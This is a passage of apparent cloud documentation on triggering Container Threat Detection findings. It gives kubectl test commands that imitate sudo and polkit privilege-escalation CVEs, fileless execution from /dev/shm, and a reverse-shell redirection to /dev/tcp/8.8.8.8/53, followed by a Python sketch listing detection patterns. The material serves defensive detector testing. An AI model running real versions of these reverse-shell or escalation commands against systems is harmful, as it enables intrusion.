              "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
              "value": "arm64" }] }}'

This test procedure triggers a ld.so.preload modification finding that you can view in Security Command Center and, if you have configured Logging for Container Threat Detection, in Cloud Logging. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center at the organization level.

Privilege Escalation: Abuse of Sudo For Privilege Escalation (CVE-2019-14287)

To trigger a Privilege Escalation: Abuse of Sudo For Privilege Escalation (CVE-2019-14287) finding, execute the sudo binary with the -u#-1 parameter. This example copies the /bin/ls binary to imitate the sudo binary and executes it with the specified parameter.

  1. Set environment variables.

  2. Use Cloud Shell to access the cluster control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
        --zone $ZONE \
        --project $PROJECT

  3. Copy /bin/ls to /tmp/sudo and execute it with the -u#-1 parameter:

    • x86 node:

      tag="ktd-test-abuse-sudo-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          "$tag" -- bash -c \
          "cp /bin/ls /tmp/sudo; /tmp/sudo -u#-1; sleep 10"

    • ARM node:

      tag="ktd-test-abuse-sudo-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
              {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
              "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
              "value": "arm64" } ]}}' \
          "$tag" -- bash -c \
          "cp /bin/ls /tmp/sudo; /tmp/sudo -u#-1; sleep 10"

This test procedure creates a Privilege Escalation: Abuse of Sudo For Privilege Escalation (CVE-2019-14287) finding you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center at the organization level.

Privilege Escalation: Fileless Execution in /dev/shm

To trigger a Privilege Escalation: Fileless Execution in /dev/shm finding, a process must be executed from the /dev/shm in-memory file system. This example uses the latest Ubuntu 24.04 image. The /bin/echo utility is copied to /dev/shm/echo. This renamed binary is then executed. The execution of a file under /dev/shm is flagged as suspicious because it mimics the behavior of an object trying to execute in memory to avoid file-based detections.

  1. Set environment variables.

  2. Use Cloud Shell to access the cluster control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
        --zone $ZONE \
        --project $PROJECT

  3. Create a privileged container and execute a program from an in-memory file system:

    • x86 node:

      tag="ktd-test-fileless-dev-shm-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          --overrides='{"spec": {"containers": [{"name": "'$tag'", "image": "marketplace.gcr.io/google/ubuntu2404:latest", "securityContext": {"privileged": true}, "command": ["bash", "-c", "cp /bin/echo /dev/shm/echo; chmod +x /dev/shm/echo; mount -o remount,exec /dev/shm; /dev/shm/echo \"Hello from /dev/shm\""]}]}}' \
          "$tag"

    • ARM node:

      tag="ktd-test-fileless-dev-shm-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          --overrides='{"apiVersion": "v1", "spec": {
              "containers": [{"name": "'$tag'", "image": "marketplace.gcr.io/google/ubuntu2404:latest", "securityContext": {"privileged": true}, "command": ["bash", "-c", "cp /bin/echo /dev/shm/echo; chmod +x /dev/shm/echo; mount -o remount,exec /dev/shm; /dev/shm/echo \"Hello from /dev/shm\""]}],
              "nodeSelector": {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
              "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
              "value": "arm64" } ]}}' \
          "$tag"

This test procedure creates a Privilege Escalation: Fileless Execution in /dev/shm finding that you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center.

Privilege Escalation: Polkit Local Privilege Escalation Vulnerability (CVE-2021-4034)

To trigger a Privilege Escalation: Polkit Local Privilege Escalation Vulnerability (CVE-2021-4034) finding, execute a pkexec binary with the GCONV_PATH environment variable set as a non-root user. This example copies the /bin/ls binary to imitate the pkexec binary and executes it with the specified parameter as user ID 1000.

  1. Set environment variables.

  2. Use Cloud Shell to access the cluster control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
        --zone $ZONE \
        --project $PROJECT

  3. Copy /bin/ls to /tmp/pkexec and execute it as user ID 1000 with the GCONV_PATH environment variable set:

    • x86 node:

      tag="ktd-test-polkit-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          --overrides='{"apiVersion": "v1", "spec": {
              "securityContext": { "runAsUser": 1000 }}}' \
          "$tag" -- bash -c \
          "cp /bin/ls /tmp/pkexec; GCONV_PATH=junk /tmp/pkexec; sleep 10"

    • ARM node:

      tag="ktd-test-polkit-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          --overrides='{"apiVersion": "v1", "spec": {
              "securityContext": { "runAsUser": 1000 }, "nodeSelector":
              {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
              "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
              "value": "arm64" } ]}}' \
          "$tag" -- bash -c \
          "cp /bin/ls /tmp/pkexec; GCONV_PATH=junk /tmp/pkexec; sleep 10"

This test procedure creates a Privilege Escalation: Polkit Local Privilege Escalation Vulnerability (CVE-2021-4034) finding you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center at the organization level.

Privilege Escalation: Sudo Potential Privilege Escalation (CVE-2021-3156)

To trigger a Privilege Escalation: Sudo Potential Privilege Escalation (CVE-2021-3156) finding, execute the sudo binary as a non-root user with the -s parameter and a parameter that ends with a backslash (\). This example copies the /bin/ls binary to imitate the sudo binary and executes it with the specified parameters.

  1. Set environment variables.

  2. Use Cloud Shell to access the cluster control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
        --zone $ZONE \
        --project $PROJECT

  3. Copy /bin/ls to /tmp/sudo and execute it as user ID 1000 with the -s parameter and an argument that ends with a backslash:

    • x86 node:

      tag="ktd-test-sudo-potential-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          --overrides='{"apiVersion": "v1", "spec": {
              "securityContext": { "runAsUser": 1000 }}}' \
          "$tag" -- bash -c \
          'cp /bin/ls /tmp/sudo; /tmp/sudo -s "123\\"; sleep 10'

    • ARM node:

      tag="ktd-test-sudo-potential-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          --overrides='{"apiVersion": "v1", "spec": {
              "securityContext": { "runAsUser": 1000 },
              "nodeSelector": { "kubernetes.io/arch":"arm64" }, "tolerations":[ { "effect":
              "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
              "value": "arm64" } ]}}' \
          "$tag" -- bash -c \
          'cp /bin/ls /tmp/sudo; /tmp/sudo -s "123\\"; sleep 10'

This test procedure creates a Privilege Escalation: Sudo Potential Privilege Escalation (CVE-2021-3156) finding you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center at the organization level.

Reverse Shell

To trigger a Reverse Shell finding, start a binary with stdin redirection to a TCP connected socket. This example copies /bin/echo to /tmp/sh, then starts /tmp/sh with redirection to the Google public DNS 8.8.8.8 on the DNS port. Nothing is printed when you run this example. To prevent any external code injection through a man-in-the-middle (MITM) attack, this example doesn't use the /bin/sh binary.

  1. Set environment variables.

  2. Use Cloud Shell to access the cluster control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
        --zone $ZONE \
        --project $PROJECT

  3. Start a binary with /bin/echo redirection to the Google public DNS:

    • x86 node:

      tag="ktd-test-reverse-shell-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          "$tag" -- bash -c \
          "cp /bin/echo /tmp/sh; /tmp/sh >& /dev/tcp/8.8.8.8/53 0>&1"

    • ARM node:

      tag="ktd-test-reverse-shell-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
              {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
              "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
              "value": "arm64" } ]}}' \
          "$tag" -- bash -c \
          "cp /bin/echo /tmp/sh; /tmp/sh >& /dev/tcp/8.8.8.8/53 0>&1"

This test procedure creates a Reverse Shell finding you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center at the organization level.

Unexpected Child Shell

To test the Unexpected Child Shell detector, you can create a process tree that includes a child shell process.

The following example creates a consul->dash process tree, which can be detected by the Unexpected Child Shell detector. This test is safe because it uses only built-in binaries. This example does the following:

  1. Creates a copy of the sh process and names it consul.
  2. Copies the echo process and names it dash.
  3. Invokes the copied dash process in the copied consul process.

To trigger an Unexpected Child Shell finding, do the following:

  1. Set environment variables.

  2. Use Cloud Shell to access the cluster control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
        --zone $ZONE \
        --project $PROJECT

  3. Use the mock consul process to invoke a mock shell:

    • x86 node:

      tag="ktd-test-unexpected-child-shell-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -ti \
          --image ubuntu "$tag" \
          --command -- /bin/sh -c \
          'cp /bin/sh /tmp/consul; cp /bin/echo /tmp/sh; \
            /tmp/consul -c "/tmp/sh child ran successfully & wait"'

    • ARM node:

      tag="ktd-test-unexpected-child-shell-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -ti \
          --image ubuntu \
          --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
              {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
              "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
              "value": "arm64" } ]}}' \
          "$tag" --command -- /bin/sh -c \
          'cp /bin/sh /tmp/consul; cp /bin/echo /tmp/sh; \
            /tmp/consul -c "/tmp/sh child ran successfully & wait"'

This test procedure creates an Unexpected Child Shell finding that you can view in Security Command Center. If Logging is configured for Container Threat Detection and you have Security Command Center Premium or Enterprise activated at the organization level, then you can view the finding in Cloud Logging too.
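The tests above share one idea: each detector keys on what was observed about the process (its executed path, arguments, environment and parent), which is why a renamed copy of /bin/ls or /bin/echo is enough to trigger it. As an added illustration, not Container Threat Detection's own logic or code from this page, the following Python sketch applies those same patterns (sudo with -u#-1, sudo -s with a trailing backslash, pkexec with GCONV_PATH, execution from /dev/shm, a stratum+tcp argument, openssl engine with a .so, a proxy variable, the rsync/shred/ipfs names, and a shell spawned under consul) to a constructed stream of exec events; the event format, the rule that any proxy value is disallowed, and the list of parents that must not spawn shells are assumptions.

```python
import os
from dataclasses import dataclass, field


@dataclass
class ExecEvent:
    """One process execution as a sensor might report it (constructed format)."""
    pid: int
    ppid: int
    exe: str                      # path that was executed, e.g. /tmp/sudo
    argv: list                    # arguments after the program name
    env: dict = field(default_factory=dict)


SHELLS = {"sh", "bash", "dash"}
# Assumption: parents that should never spawn a shell (the page's test uses consul).
UNEXPECTED_SHELL_PARENTS = {"consul"}
# Variables named on the page; assumption: any non-empty value counts as disallowed.
PROXY_VARS = {"HTTP_PROXY", "http_proxy"}
REMOTE_COPY_TOOLS = {"rsync"}
BULK_DELETE_TOOLS = {"shred"}
KNOWN_BAD_NAMES = {"ipfs"}


def _name(path):
    return os.path.basename(path)


def classify(ev, parent=None):
    """Return the finding category one exec event would raise, or None.

    Only the observed path, arguments, environment and parent are consulted;
    the file's real contents (here, always ls or echo) play no part.
    """
    name = _name(ev.exe)
    if name == "sudo" and "-u#-1" in ev.argv:
        return "Privilege Escalation: Abuse of Sudo For Privilege Escalation (CVE-2019-14287)"
    if name == "sudo" and "-s" in ev.argv and ev.argv[-1].endswith("\\"):
        return "Privilege Escalation: Sudo Potential Privilege Escalation (CVE-2021-3156)"
    if name == "pkexec" and "GCONV_PATH" in ev.env:
        return "Privilege Escalation: Polkit Local Privilege Escalation Vulnerability (CVE-2021-4034)"
    if ev.exe.startswith("/dev/shm/"):
        return "Privilege Escalation: Fileless Execution in /dev/shm"
    if any("stratum+tcp" in a for a in ev.argv):
        return "Impact: Suspicious crypto mining activity using the Stratum Protocol"
    if name == "openssl" and ev.argv[:1] == ["engine"] and any(a.endswith(".so") for a in ev.argv[1:]):
        return "Execution: Suspicious OpenSSL Shared Object Loaded"
    if any(ev.env.get(v) for v in PROXY_VARS):
        return "Execution: Program Run with Disallowed HTTP Proxy Env"
    if name in REMOTE_COPY_TOOLS:
        return "Exfiltration: Launch Remote File Copy Tools In Container"
    if name in BULK_DELETE_TOOLS:
        return "Impact: Remove Bulk Data From Disk"
    if name in KNOWN_BAD_NAMES:
        return "Impact: Detect Malicious Cmdlines"
    if name in SHELLS and parent is not None and _name(parent.exe) in UNEXPECTED_SHELL_PARENTS:
        return "Unexpected Child Shell"
    return None


def scan(events):
    """Classify a stream of exec events; returns {pid: category} for the hits."""
    by_pid = {e.pid: e for e in events}
    hits = {}
    for e in events:
        category = classify(e, by_pid.get(e.ppid))
        if category:
            hits[e.pid] = category
    return hits


# Constructed sample stream modelled on this page's tests. Every "tool" is a
# renamed copy of /bin/ls or /bin/echo; pid 100 is the driving bash -c and
# pid 113 is a genuine ls, neither of which should match.
SAMPLE_EVENTS = [
    ExecEvent(100, 1, "/bin/bash", ["-c", "..."]),
    ExecEvent(101, 100, "/tmp/sudo", ["-u#-1"]),
    ExecEvent(102, 100, "/tmp/sudo", ["-s", "123\\"]),
    ExecEvent(103, 100, "/tmp/pkexec", [], {"GCONV_PATH": "junk"}),
    ExecEvent(104, 100, "/dev/shm/echo", ["Hello from /dev/shm"]),
    ExecEvent(105, 100, "/tmp/curl", ["--url=stratum+tcp"]),
    ExecEvent(106, 100, "/tmp/openssl", ["engine", "/tmp/fakelib.so"]),
    ExecEvent(107, 100, "/tmp/curl", [], {"HTTP_PROXY": "127.0.0.1:8080"}),
    ExecEvent(108, 100, "/tmp/rsync", []),
    ExecEvent(109, 100, "/tmp/shred", []),
    ExecEvent(110, 100, "/tmp/ipfs", []),
    ExecEvent(111, 100, "/tmp/consul", ["-c", "/tmp/sh child ran successfully & wait"]),
    ExecEvent(112, 111, "/tmp/sh", ["child", "ran", "successfully"]),
    ExecEvent(113, 100, "/bin/ls", ["-l"]),
]

if __name__ == "__main__":
    for pid, category in scan(SAMPLE_EVENTS).items():
        print(pid, category)
```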


Last updated 2026-02-20 UTC.